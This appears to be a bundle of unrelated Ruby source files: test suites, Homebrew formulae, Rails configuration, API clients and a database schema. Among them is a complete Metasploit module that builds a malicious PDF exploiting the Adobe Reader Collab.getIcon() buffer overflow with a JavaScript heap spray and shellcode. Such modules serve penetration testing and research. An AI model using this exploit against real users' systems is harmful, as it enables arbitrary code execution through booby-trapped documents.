describe-02 which contains a call to favorite_vegetable, then describe-03 # If the plugin exploded, we'd see describe-01 but not describe-02 results = json_result['profiles'][0]['controls'][0]['results'] results.count.must_equal 3 # We expect the description of describe-02 to include the word aubergine # (this is the functionality of the describe_dsl we installed) second_result = json_result['profiles'][0]['controls'][0]['results'][1] second_result.wont_be_nil second_result['code_desc'].must_include 'aubergine' end end describe 'test dsl plugin type support' do let(:profile_file) { 'test_dsl.rb' } it 'works correctly with test dsl extensions' do run_result.stderr.must_equal '' # The test_dsl.rb file has one control, with # describe-01, describe-02 which contains a call to favorite_legume, then describe-03 # If the plugin exploded, we'd see describe-01 but not describe-02 results = json_result['profiles'][0]['controls'][0]['results'] results.count.must_equal 3 # I spent a while trying to find a way to get the test to alter its name; # that won't work for various setup reasons. # So, it just throws an exception with the word 'edemame' in it. second_result = json_result['profiles'][0]['controls'][0]['results'][1] second_result.wont_be_nil second_result['status'].must_equal 'failed' second_result['message'].must_include 'edemame' end end describe 'resource dsl plugin type support' do let(:profile_file) { 'unused' } it 'works correctly with test dsl extensions' do # We have to build a custom command line - need to load the whole profile, # so the libraries get loaded. cmd = 'exec ' cmd += File.join(profile_path, 'dsl_plugins') cmd += ' --controls=/^rdsl-control/ ' run_result = run_inspec_with_plugin(cmd, plugin_path: dsl_plugin_path) run_result.stderr.must_equal '' # We should have three controls; 01 and 03 just do a string match. # 02 uses the custom resource, which relies on calls to the resource DSL. # If the plugin exploded, we'd see rdsl-control-01 but not rdsl-control-02 json_result = run_result.payload.json results = json_result['profiles'][0]['controls'] results.count.must_equal 3 # Control 2 has 2 describes; one uses a simple explicit matcher, # while the second uses a matcher defined via a macro provided by the resource DSL. control2_results = results[1]['results'] control2_results[0]['status'].must_equal 'passed' control2_results[0]['code_desc'].must_include 'favorite_berry' control2_results[0]['code_desc'].must_include 'blendable' control2_results[1]['status'].must_equal 'passed' control2_results[1]['code_desc'].must_include 'favorite_berry' control2_results[1]['code_desc'].must_include 'have drupals' end end end #=========================================================================================# # Train Plugin Support #=========================================================================================# describe 'train plugin support' do describe 'when a train plugin is installed' do include FunctionalHelper it 'can run inspec detect against a URL target' do outcome = inspec_with_env('detect -t test-fixture://', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'train-test-fixture')) outcome.exit_status.must_equal(0) outcome.stderr.must_be_empty lines = outcome.stdout.split("\n") lines.grep(/Name/).first.must_include('test-fixture') lines.grep(/Name/).first.wont_include('train-test-fixture') lines.grep(/Release/).first.must_include('0.1.0') lines.grep(/Families/).first.must_include('os') lines.grep(/Families/).first.must_include('windows') lines.grep(/Families/).first.must_include('unix') lines.grep(/Arch/).first.must_include('mock') end it 'can run inspec detect against a test-fixture backend' do outcome = inspec_with_env('detect -b test-fixture', INSPEC_CONFIG_DIR: File.join(config_dir_path, 'train-test-fixture')) outcome.exit_status.must_equal(0) outcome.stderr.must_be_empty lines = outcome.stdout.split("\n") lines.grep(/Name/).first.must_include('test-fixture') lines.grep(/Name/).first.wont_include('train-test-fixture') lines.grep(/Release/).first.must_include('0.1.0') lines.grep(/Families/).first.must_include('os') lines.grep(/Families/).first.must_include('windows') lines.grep(/Families/).first.must_include('unix') lines.grep(/Arch/).first.must_include('mock') end it 'can run inspec shell and read a file' do outcome = inspec_with_env("shell -t test-fixture:// -c 'file(\"any-path\").content'", INSPEC_CONFIG_DIR: File.join(config_dir_path, 'train-test-fixture')) outcome.exit_status.must_equal(0) outcome.stderr.must_be_empty outcome.stdout.chomp.must_equal 'Lorem Ipsum' end it 'can run inspec shell and run a command' do outcome = inspec_with_env("shell -t test-fixture:// -c 'command(\"echo hello\").exit_status'", INSPEC_CONFIG_DIR: File.join(config_dir_path, 'train-test-fixture')) outcome.exit_status.must_equal(0) outcome.stderr.must_be_empty outcome.stdout.chomp.must_equal "17" outcome = inspec_with_env("shell -t test-fixture:// -c 'command(\"echo hello\").stdout'", INSPEC_CONFIG_DIR: File.join(config_dir_path, 'train-test-fixture')) outcome.exit_status.must_equal(0) outcome.stderr.must_be_empty outcome.stdout.chomp.must_equal "Mock Command Result stdout" end end end
class BoshInit < Formula desc "creates and updates the Director VM" homepage "https://github.com/cloudfoundry/bosh-init" version "0.0.99" url "https://s3.amazonaws.com/bosh-init-artifacts/bosh-init-#{version}-darwin-amd64" sha256 "3a2f63493ecede7b9d99d46ffd0c99d5c40edd44db6ddd97ffcc52c56b4ebb89" depends_on :arch => :x86_64 conflicts_with "pivotal/tap/bosh-init", :because => "the Pivotal tap ships an older bosh-init version and is outdated" def install bin.install "bosh-init-#{version}-darwin-amd64" => "bosh-init" end test do system "#{bin}/bosh-init" end end
require 'fileutils' module CkeditorFileUtils CKEDITOR_INSTALL_DIRECTORY = File.join(::Rails.root.to_s, '/public/javascripts/ckeditor/') PLUGIN_INSTALL_DIRECTORY = File.join(::Rails.root.to_s, '/vendor/plugins/easy-ckeditor/') def CkeditorFileUtils.recursive_copy(options) source = options[:source] dest = options[:dest] logging = options[:logging].nil? ? true : options[:logging] Dir.foreach(source) do |entry| next if entry =~ /^\./ if File.directory?(File.join(source, entry)) unless File.exist?(File.join(dest, entry)) if logging puts "Creating directory #{entry}..." end FileUtils.mkdir File.join(dest, entry)#, :noop => true#, :verbose => true end recursive_copy(:source => File.join(source, entry), :dest => File.join(dest, entry), :logging => logging) else if logging puts " Installing file #{entry}..." end FileUtils.cp File.join(source, entry), File.join(dest, entry)#, :noop => true#, :verbose => true end end end def CkeditorFileUtils.backup_existing source = File.join(::Rails.root.to_s,'/public/javascripts/ckeditor') dest = File.join(::Rails.root.to_s,'/public/javascripts/ckeditor_bck') FileUtils.rm_r(dest) if File.exists? dest FileUtils.mv source, dest end def CkeditorFileUtils.copy_configuration return if Rails.env.production? # need to copy over the code if it doesn't already exist config_file = File.join(::Rails.root.to_s, '/vendor/plugins/easy-ckeditor/public/javascripts/ckcustom.js') dest = File.join(::Rails.root.to_s, '/public/javascripts/ckcustom.js') backup_config = File.join(::Rails.root.to_s, '/public/javascripts/ckeditor/config.bak') config_symlink = File.join(::Rails.root.to_s, '/public/javascripts/ckeditor/config.js') FileUtils.cp(config_file, dest) unless File.exist?(dest) if File.exist?(config_symlink) unless File.symlink?(config_symlink) FileUtils.rm(backup_config) if File.exist?(backup_config) FileUtils.mv(config_symlink,backup_config) FileUtils.cp(dest, config_symlink) end else FileUtils.cp(dest, config_symlink) end end def CkeditorFileUtils.create_uploads_directory uploads = File.join(::Rails.root.to_s, '/public/uploads') FileUtils.mkdir(uploads) unless File.exist?(uploads) end def CkeditorFileUtils.install(log) directory = File.join(::Rails.root.to_s, '/vendor/plugins/easy-ckeditor/') source = File.join(directory,'/public/javascripts/ckeditor/') FileUtils.mkdir(CKEDITOR_INSTALL_DIRECTORY) # recursively copy all our files over recursive_copy(:source => source, :dest => CKEDITOR_INSTALL_DIRECTORY, :logging => log) # create the upload directories create_uploads_directory end ################################################################## # remove the existing install (if any) # def CkeditorFileUtils.destroy if File.exist?(CKEDITOR_INSTALL_DIRECTORY) FileUtils.rm_r(CKEDITOR_INSTALL_DIRECTORY) FileUtils.rm(File.join(::Rails.root.to_s, '/public/javascripts/ckcustom.js')) \ if File.exist? File.join(::Rails.root.to_s, '/public/javascripts/ckcustom.js') end end def CkeditorFileUtils.rm_plugin if File.exist?(PLUGIN_INSTALL_DIRECTORY) FileUtils.rm_r(PLUGIN_INSTALL_DIRECTORY) end end def CkeditorFileUtils.destroy_and_install CkeditorFileUtils.destroy # now install fresh install(true) # copy over the config file (unless it exists) copy_configuration end def CkeditorFileUtils.check_and_install # check to see if already installed, if not install unless File.exist?(CKEDITOR_INSTALL_DIRECTORY) install(false) end # copy over the config file (unless it exists) copy_configuration end end
require 'rails_helper' RSpec.shared_examples_for "work_metadata" do describe "metadata" do let(:fields) do [:unit, :staff_notes, :abstract, :collection_identifier, :sub_collection, :spatial, :alternative, :temporal, :format, :provenance, :work_type, :preservation_level, :preservation_level_rationale, :bibliographic_citation, :handle, :archival_unit] end it "has additional metadata" do expect(subject).to respond_to(*fields) end end end
def Threes(number) while number > 1 if number%3 == 0 p number.to_s + " 0" number = number/3 else if (number+1)%3 == 0 p number.to_s + " 1" number = (number+1)/3 elsif (number-1)%3 == 0 p number.to_s + " -1" number = (number-1)/3 end end end p number.to_s end Threes(100) Threes(31337357)
class Rinetd < Formula desc "Internet TCP redirection server" homepage "https://www.boutell.com/rinetd/" url "https://www.boutell.com/rinetd/http/rinetd.tar.gz" version "0.62" sha256 "0c68d27c5bd4b16ce4f58a6db514dd6ff37b2604a88b02c1dfcdc00fc1059898" bottle do rebuild 1 # sha256 "fe8636ee77c709a3a2df599058c59d7cdbaaa6505fa42e9bac143af95c0c835c" => :mojave sha256 "44750b361b999c09a17a2bc8c576585a790c42bee66abe4df191b7b0cafe304c" => :high_sierra sha256 "7a52fc5d01d83fd186626a6cff981e65da8943186973a4314efa2c561480325e" => :sierra sha256 "30c72c1a5764aa20e7d8e232bcfe979f138e5029966c43468a886481304c39cb" => :el_capitan end def install inreplace "rinetd.c" do |s| s.gsub! "/etc/rinetd.conf", "#{etc}/rinetd.conf" s.gsub! "/var/run/rinetd.pid", "#{var}/rinetd.pid" end inreplace "Makefile" do |s| s.gsub! "/usr/sbin", sbin s.gsub! "/usr/man", man end sbin.mkpath man8.mkpath system "make", "install" conf = etc/"rinetd.conf" unless conf.exist? conf.write <<~EOS # forwarding rules go here # # you may specify allow and deny rules after a specific forwarding rule # to apply to only that forwarding rule # # bindadress bindport connectaddress connectport EOS end end test do system "#{sbin}/rinetd", "-h" end end
module TwilioExtensions module AccountContext def available_phone_numbers(country_code=:unset) client = @version.instance_variable_get(:@domain).client TwilioMock::Mocker.new(username: client.account_sid, token: client.auth_token).available_number if TwilioMock::Testing.enabled? super(country_code) end end module Messages def create(attrs) client = @version.instance_variable_get(:@domain).client TwilioMock::Mocker.new(username: client.account_sid, token: client.auth_token).create_message(attrs) if TwilioMock::Testing.enabled? super(attrs) end end module IncomingPhoneNumbers def create(attrs) client = @version.instance_variable_get(:@domain).client TwilioMock::Mocker.new(username: client.account_sid, token: client.auth_token).buy_number(attrs) if TwilioMock::Testing.enabled? super(attrs) end end module Lookups def fetch(*) client = @version.instance_variable_get(:@domain).client TwilioMock::LookupMocker.new(username: client.account_sid, token: client.auth_token).lookup(@solution[:phone_number]) if TwilioMock::Testing.enabled? super end end end
class CreateQuestions < ActiveRecord::Migration[6.0] def change create_table :questions do |t| t.string :title t.belongs_to :section, null: false, foreign_key: true t.timestamps end end end
Rails.application.configure do # Settings specified here will take precedence over those in config/application.rb. config.hosts.clear # In the development environment your application's code is reloaded on # every request. This slows down response time but is perfect for development # since you don't have to restart the web server when you make code changes. config.cache_classes = false # Do not eager load code on boot. config.eager_load = false # Show full error reports. config.consider_all_requests_local = true # Enable/disable caching. By default caching is disabled. # Run rails dev:cache to toggle caching. if Rails.root.join('tmp', 'caching-dev.txt').exist? config.cache_store = :memory_store config.public_file_server.headers = { 'Cache-Control' => "public, max-age=#{2.days.to_i}" } else config.action_controller.perform_caching = false config.cache_store = :null_store end # Store uploaded files on the local file system (see config/storage.yml for options). config.active_storage.service = :local # Don't care if the mailer can't send. config.action_mailer.raise_delivery_errors = false config.action_mailer.perform_caching = false # Print deprecation notices to the Rails logger. config.active_support.deprecation = :log # Raise an error on page load if there are pending migrations. config.active_record.migration_error = :page_load # Highlight code that triggered database queries in logs. config.active_record.verbose_query_logs = true # Raises error for missing translations. # config.action_view.raise_on_missing_translations = true # Use an evented file watcher to asynchronously detect changes in source code, # routes, locales, etc. This feature depends on the listen gem. config.file_watcher = ActiveSupport::EventedFileUpdateChecker end
class SageAvatarGroup < SageComponent set_attribute_schema({ items: [[ color: [:optional, NilClass, SageSchemas::COLORS], css_classes: [:optional, String], initials: String, ]] }) end
# Copyright:: Copyright 2010-2016, Chef Software, Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # NOTE: This file is generated by running `rake version` in the top level of # this repo. Do not edit this manually. Edit the VERSION file and run the rake # task instead. #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! require "chef/version_string" class Chef CHEF_ROOT = File.expand_path("../..", __FILE__) VERSION = Chef::VersionString.new("14.0.48") end # # NOTE: the Chef::Version class is defined in version_class.rb # # NOTE: DO NOT Use the Chef::Version class on Chef::VERSIONs. The # Chef::Version class is for _cookbooks_ only, and cannot handle # pre-release versions like "10.14.0.rc.2". Please use Rubygem's # Gem::Version class instead. #
# frozen_string_literal: true module SigepWeb class WebServiceReverseLogisticApi def initialize @client = Savon.client( wsdl: url, ssl_verify_mode: :none ) end def process(method, message) @client.call(method, soap_action: "", message: message) end private def url if ENV["GEM_ENV"] == "test" "http://webservicescolhomologacao.correios.com.br/ScolWeb/WebServiceScol?wsdl" else "http://webservicescol.correios.com.br/ScolWeb/WebServiceScol?wsdl" end end end end
# frozen_string_literal: true require 'spec_helper' RSpec.describe ::Gitlab::SubscriptionPortal do using RSpec::Parameterized::TableSyntax let(:env_value) { nil } before do stub_env('CUSTOMER_PORTAL_URL', env_value) end describe '.default_subscriptions_url' do where(:test, :development, :result) do false | false | 'https://customers.gitlab.com' false | true | 'https://customers.staging.gitlab.com' true | false | 'https://customers.staging.gitlab.com' end before do allow(Rails).to receive_message_chain(:env, :test?).and_return(test) allow(Rails).to receive_message_chain(:env, :development?).and_return(development) end with_them do subject { described_class.default_subscriptions_url } it { is_expected.to eq(result) } end end describe '.subscriptions_url' do subject { described_class.subscriptions_url } context 'when CUSTOMER_PORTAL_URL ENV is unset' do it { is_expected.to eq('https://customers.staging.gitlab.com') } end context 'when CUSTOMER_PORTAL_URL ENV is set' do let(:env_value) { 'https://customers.example.com' } it { is_expected.to eq(env_value) } end end describe '.subscriptions_comparison_url' do subject { described_class.subscriptions_comparison_url } link_match = %r{\Ahttps://about\.gitlab\.((cn/pricing/saas)|(com/pricing/gitlab-com))/feature-comparison\z} it { is_expected.to match(link_match) } end context 'url methods' do where(:method_name, :result) do :default_subscriptions_url | 'https://customers.staging.gitlab.com' :payment_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_validation' :registration_validation_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_registration_validation' :subscriptions_graphql_url | 'https://customers.staging.gitlab.com/graphql' :subscriptions_more_minutes_url | 'https://customers.staging.gitlab.com/buy_pipeline_minutes' :subscriptions_more_storage_url | 'https://customers.staging.gitlab.com/buy_storage' :subscriptions_manage_url | 'https://customers.staging.gitlab.com/subscriptions' :subscriptions_plans_url | 'https://about.gitlab.com/pricing/' :subscriptions_instance_review_url | 'https://customers.staging.gitlab.com/instance_review' :subscriptions_gitlab_plans_url | 'https://customers.staging.gitlab.com/gitlab_plans' :edit_account_url | 'https://customers.staging.gitlab.com/customers/edit' end with_them do subject { described_class.send(method_name) } it { is_expected.to eq(result) } end end describe '.add_extra_seats_url' do subject { described_class.add_extra_seats_url(group_id) } let(:group_id) { 153 } it { is_expected.to eq("https://customers.staging.gitlab.com/gitlab/namespaces/#{group_id}/extra_seats") } end describe '.upgrade_subscription_url' do subject { described_class.upgrade_subscription_url(group_id, plan_id) } let(:group_id) { 153 } let(:plan_id) { 5 } it { is_expected.to eq("https://customers.staging.gitlab.com/gitlab/namespaces/#{group_id}/upgrade/#{plan_id}") } end describe '.renew_subscription_url' do subject { described_class.renew_subscription_url(group_id) } let(:group_id) { 153 } it { is_expected.to eq("https://customers.staging.gitlab.com/gitlab/namespaces/#{group_id}/renew") } end end
require 'carrierwave' require "tencent_cos_sdk" module CarrierWave module Storage class TencentCos < Abstract # Create and save a file instance to your engine. def store!(file) f = CarrierWave::Storage::TencentCos::File.new(uploader.store_path) f.store(file) f end def cache!(file) f = CarrierWave::Storage::TencentCos::File.new(uploader.store_path) f.store(file) f end # Load and return a file instance from your engine. def retrieve!(identifier) CarrierWave::Storage::TencentCos::File.new(uploader.store_path(identifier)) end # Subclass or duck-type CarrierWave::SanitizedFile # responsible for storing the file to your engine. class File attr_reader :path # Initialize as required. def initialize(path) @path = path end def store(new_file) TencentCosSdk.put @path, file: new_file.path end def url "https://zoosg-1256792782.file.myqcloud.com/#{@path}" end def delete TencentCosSdk.delete @path end end # File end # TencentCos end # Storage end # CarrierWave
require 'hyperclient' module Payshares class Client include Contracts def self.default(options={}) new options.merge({ horizon: "https://horizon.payshares.org" }) end def self.default_testnet(options={}) new options.merge({ horizon: "https://horizon-testnet.payshares.org", friendbot: "https://horizon-testnet.payshares.org", }) end def self.localhost(options={}) new options.merge({ horizon: "", #TODO: figure out a real port }) end attr_reader :horizon Contract ({horizon: String}) => Any def initialize(options) @options = options @horizon = Hyperclient.new(options[:horizon]) do |client| client.faraday_block = lambda do |conn| conn.use Faraday::Response::RaiseError conn.use FaradayMiddleware::FollowRedirects conn.request :url_encoded conn.response :hal_json, content_type: /\bjson$/ conn.adapter :excon end client.headers = { 'Accept' => 'application/hal+json,application/problem+json,application/json' } end end def friendbot(account) raise NotImplementedError end # Contract Payshares::Account => Payshares::AccountInfo Contract Payshares::Account => Any def account_info(account) address = account.address @horizon.account(address:address) end Contract ({ from: Payshares::Account, to: Payshares::Account, amount: Payshares::Amount }) => Any def send_payment(options={}) from = options[:from] sequence = options[:sequence] || account_info(from).sequence payment = Payshares::Transaction.payment({ account: from.keypair, destination: options[:to].keypair, sequence: sequence + 1, amount: options[:amount].to_payment, }) envelope_hex = payment.to_envelope(from.keypair).to_xdr(:hex) @horizon.transactions._post(tx: envelope_hex) end Contract ({ account: Maybe[Payshares::Account], limit: Maybe[Pos] }) => TransactionPage def transactions(options={}) args = options.slice(:limit) resource = if options[:account] args = args.merge(address: options[:account].address) @horizon.account_transactions(args) else @horizon.transactions(args) end TransactionPage.new(resource) end end end
require "test_helper" class SongsheetTest < ActiveSupport::TestCase test "all_media returns tracks and songsheet" do songsheet = create :songsheet, :with_track media = [ create(:medium, record: songsheet), create(:medium, record: songsheet.track) ] assert_equal media.to_set, songsheet.all_media.to_set end end
json.partial! "courseofstudies/courseofstudy", courseofstudy: @courseofstudy
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::PDF def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Collab.getIcon() Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', 'jduck' ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0927' ], [ 'OSVDB', '53647' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ # test results (on Windows XP SP3) # reader 7.0.5 - no trigger # reader 7.0.8 - no trigger # reader 7.0.9 - no trigger # reader 7.1.0 - no trigger # reader 7.1.1 - reported not vulnerable # reader 8.0.0 - works # reader 8.1.2 - works # reader 8.1.3 - reported not vulnerable # reader 9.0.0 - works # reader 9.1.0 - reported not vulnerable [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ], ], 'DisclosureDate' => 'Mar 24 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Make some nops nops = Rex::Text.to_unescape(make_nops(4)) # Randomize variables rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) rand9 = rand_text_alpha(rand(100) + 1) rand10 = rand_text_alpha(rand(100) + 1) rand11 = rand_text_alpha(rand(100) + 1) rand12 = rand_text_alpha(rand(100) + 1) script = %Q| var #{rand1} = unescape("#{shellcode}"); var #{rand2} =""; for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}"); #{rand4} = #{rand2} + #{rand1}; #{rand5} = unescape("#{nops}"); #{rand6} = 20; #{rand7} = #{rand6}+#{rand4}.length while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5}; #{rand8} = #{rand5}.substring(0, #{rand7}); #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7}); while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8}; #{rand10} = new Array(); for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4}; var #{rand12} = unescape("%0a"); while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12}; #{rand12} = "N."+#{rand12}; Collab.getIcon(#{rand12}); | # Create the pdf #pdf = make_pdf(script) pdf = CreatePDF(script) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end end
class User < ActiveRecord::Base has_secure_password has_many :movies validates :name, :email, presence: true validates :email, uniqueness: true end
require 'devise_feature_flags/version' require 'devise_feature_flags/models/devise_feature_flag' require 'active_record' require 'devise' module DeviseFeatureFlags class Feature < ::ActiveRecord::Base self.table_name = 'feature_flags_features' has_many :feature_users, primary_key: :key, foreign_key: :feature_flag_key end class FeatureUser < ::ActiveRecord::Base self.table_name = 'feature_flags_users' belongs_to :feature, primary_key: :key, foreign_key: :feature_flag_key end end Devise.add_module :devise_feature_flags#, :model => 'devise_feature_flags/models/devise_feature_flag'
class Registration < ApplicationRecord belongs_to :user, inverse_of: :registrations belongs_to :course, inverse_of: :registrations validates :user, presence: true validates :course, presence: true end
# Automatic Image alt tags from image names extension class Middleman::Extensions::AutomaticAltTags < ::Middleman::Extension def initialize(app, options_hash={}, &block) super end helpers do # Override default image_tag helper to automatically insert alt tag # containing image name. def image_tag(path) unless path.include?('://') params[:alt] ||= '' real_path = path real_path = File.join(images_dir, real_path) unless real_path.start_with?('/') full_path = File.join(source_dir, real_path) if File.exist?(full_path) begin alt_text = File.basename(full_path, '.*') alt_text.capitalize! params[:alt] = alt_text end end end super(path) end end end
# frozen_string_literal: true # Fetches the self monitoring metrics dashboard and formats the output. # Use Gitlab::Metrics::Dashboard::Finder to retrieve dashboards. module Metrics module Dashboard class SelfMonitoringDashboardService < ::Metrics::Dashboard::PredefinedDashboardService DASHBOARD_PATH = 'config/prometheus/self_monitoring_default.yml' DASHBOARD_NAME = N_('Default dashboard') SEQUENCE = [ STAGES::CustomMetricsInserter, STAGES::MetricEndpointInserter, STAGES::VariableEndpointInserter, STAGES::PanelIdsInserter, STAGES::Sorter ].freeze class << self def valid_params?(params) matching_dashboard?(params[:dashboard_path]) || self_monitoring_project?(params) end def all_dashboard_paths(_project) [{ path: DASHBOARD_PATH, display_name: _(DASHBOARD_NAME), default: true, system_dashboard: false, out_of_the_box_dashboard: out_of_the_box_dashboard? }] end def self_monitoring_project?(params) params[:dashboard_path].nil? && params[:environment]&.project&.self_monitoring? end end end end end
describe GraylogAPI::System::Cluster, vcr: true do include_context 'graylogapi' context 'node' do subject(:response) do graylogapi.system.cluster.node end it 'code 200' do expect(response.code).to eq 200 end it 'contain cluster_id' do expect(response.keys).to include 'cluster_id' end it 'contain node_id' do expect(response.keys).to include 'node_id' end end context 'nodes' do subject(:response) do graylogapi.system.cluster.nodes end it 'code 200' do expect(response.code).to eq 200 end it 'contain nodes' do expect(response.keys).to include 'nodes' end it 'contain count' do expect(response.keys).to include 'total' end end context 'node_by_id' do subject(:response) do graylogapi.system.cluster.node_by_id(node['node_id']) end let(:node) { graylogapi.system.cluster.node } it 'code 200' do expect(response.code).to eq 200 end it 'contain node_id' do expect(response['node_id']).to eq node['node_id'] end end context 'node_id_to_hostname' do subject(:response) do graylogapi.system.cluster.node_by_hostname(node['hostname']) end let(:node) { graylogapi.system.cluster.node } it 'has eq hostname' do expect(response['hostname']).to eq node['hostname'] end it 'has eq node_id' do expect(response['node_id']).to eq node['node_id'] end end end
require File.expand_path(File.dirname(__FILE__) + '/test_helper.rb') LoadedYaml = ['en', 'en-BORK'].inject({}) do |h, locale| h[locale] = YAML.load_file(File.expand_path(File.dirname(__FILE__) + "/../lib/locales/#{locale}.yml"))[locale]['faker'] h end class TestLocale < Test::Unit::TestCase def teardown Faker::Config.locale = nil end def test_locale_separate_from_i18n I18n.locale = :en Faker::Config.locale = :de assert Faker::PhoneNumber.phone_number.match(/\(0\d+\) \d+|\+49-\d+-\d+/) assert Faker::Address.street_name.match(//) Faker::Config.locale = :ru assert Faker::Internet.domain_name.match(/([\da-z\.-]+)\.([a-z\.]{2,6})/) end def test_configured_locale_translation Faker::Config.locale = 'en-BORK' assert_equal Faker::Base.translate('faker.lorem.words').first, LoadedYaml['en-BORK']['lorem']['words'].first end def test_locale_override_when_calling_translate Faker::Config.locale = 'en-BORK' assert_equal Faker::Base.translate('faker.lorem.words', :locale => :en).first, LoadedYaml['en']['lorem']['words'].first end def test_translation_fallback Faker::Config.locale = 'en-BORK' assert_nil LoadedYaml['en-BORK']['name'] assert_equal Faker::Base.translate('faker.name.first_name').first, LoadedYaml['en']['name']['first_name'].first end def test_regex Faker::Config.locale = 'en-GB' re = /[A-PR-UWYZ]([A-HK-Y][0-9][ABEHMNPRVWXY0-9]?|[0-9][ABCDEFGHJKPSTUW0-9]?) [0-9][ABD-HJLNP-UW-Z]{2}/ assert re.match(result = Faker::Address.postcode), "#{result} didn't match #{re}" end def test_available_locales assert I18n.locale_available?('en-GB') end end
# encoding: UTF-8 # This file is auto-generated from the current state of the database. Instead # of editing this file, please use the migrations feature of Active Record to # incrementally modify your database, and then regenerate this schema definition. # # Note that this schema.rb definition is the authoritative source for your # database schema. If you need to create the application database on another # system, you should be using db:schema:load, not running all the migrations # from scratch. The latter is a flawed and unsustainable approach (the more migrations # you'll amass, the slower it'll run and the greater likelihood for issues). # # It's strongly recommended that you check this file into your version control system. ActiveRecord::Schema.define(version: 0) do create_table "alias", force: :cascade do |t| t.string "name", limit: 30 t.string "type", limit: 10 t.integer "pid", limit: 4 end create_table "avatar", force: :cascade do |t| t.integer "user_id", limit: 4 t.integer "x", limit: 4 t.integer "y", limit: 4 t.integer "s", limit: 4 end create_table "cache", force: :cascade do |t| t.string "type", limit: 10 t.string "name", limit: 255 t.text "content", limit: 4294967295 end create_table "country", force: :cascade do |t| t.string "name", limit: 45 t.string "alias", limit: 45 t.integer "region", limit: 4 t.string "lang", limit: 5 end create_table "experience", force: :cascade do |t| t.integer "user_id", limit: 4 t.string "job", limit: 90 t.string "company", limit: 90 t.string "time", limit: 45 t.text "description", limit: 4294967295 end create_table "language", force: :cascade do |t| t.string "name", limit: 255 t.string "common", limit: 255 t.string "alias", limit: 255 t.string "region", limit: 2 end create_table "org", force: :cascade do |t| t.string "type", limit: 3 t.string "name", limit: 255 t.string "sub", limit: 225 t.string "phone", limit: 45 t.string "fax", limit: 45 t.string "website", limit: 255 t.string "address", limit: 255 t.string "logo", limit: 255 t.integer "nationality", limit: 4 t.text "description", limit: 65535 t.string "header", limit: 45 t.string "color", limit: 7 t.string "cover", limit: 50 end create_table "org_admin", id: false, force: :cascade do |t| t.integer "org_id", limit: 4 t.integer "user_id", limit: 4 t.string "org_type", limit: 3 end create_table "region", force: :cascade do |t| t.string "name", limit: 255 end create_table "skill", force: :cascade do |t| t.string "skillname", limit: 45 t.string "alias", limit: 45 t.text "description", limit: 4294967295 t.string "image", limit: 45 t.string "categoryname", limit: 45 t.string "category", limit: 45 t.string "link", limit: 90 t.string "linkedit", limit: 90 t.integer "people", limit: 4 t.integer "jobs", limit: 4 end create_table "social", force: :cascade do |t| t.integer "user_id", limit: 4 t.string "facebook", limit: 255 t.string "google+", limit: 255 t.string "twitter", limit: 255 t.string "yahoo", limit: 255 t.string "github", limit: 255 t.string "gmail", limit: 255 t.string "skype", limit: 255 t.string "linkedin", limit: 255 t.string "youtube", limit: 255 t.string "phone", limit: 255 t.string "ask", limit: 255 end create_table "test", force: :cascade do |t| t.string "username", limit: 100 t.string "email", limit: 100 t.string "password", limit: 200 end create_table "user", id: false, force: :cascade do |t| t.integer "id", limit: 4, null: false t.string "name", limit: 45 t.string "first_name", limit: 20, null: false t.string "last_name", limit: 20, null: false t.integer "order_name", limit: 4, null: false t.string "email", limit: 45, default: "", null: false t.string "password", limit: 45 t.string "alias", limit: 45 t.integer "lang", limit: 4 t.datetime "register" t.string "search", limit: 45 t.string "avatar", limit: 45 t.string 